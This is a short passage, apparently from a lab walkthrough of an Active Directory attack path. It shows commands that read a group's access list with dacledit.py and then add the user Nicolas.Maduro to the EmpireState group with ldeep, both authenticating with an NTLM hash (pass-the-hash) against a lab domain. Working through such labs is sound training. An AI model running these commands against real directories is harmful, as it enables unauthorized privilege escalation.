AddMember on Group (RadioCity -> EmpireState)
Now as Nicolas we are in the RadioCity, so we can add a member to EmpireState's group.
So we just add Nicolas.Maduro just like we did before
See who is part of the group
Nobody is part of the group, YETTTT!
dacledit.py -action 'read' -principal nicolas.maduro -target 'Empirestate' 'NewYork.local'/'nicolas.maduro' -hashes 00000000000000000000000000000000:b3b3717f7d51b37fb325f7e7d048e998

Add Nicolas.Maduro to EmpireState
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=EmpireState,OU=WestSide,DC=NewYork,DC=local"
See Nicolas is part of the Group now! Move ON!

Last updated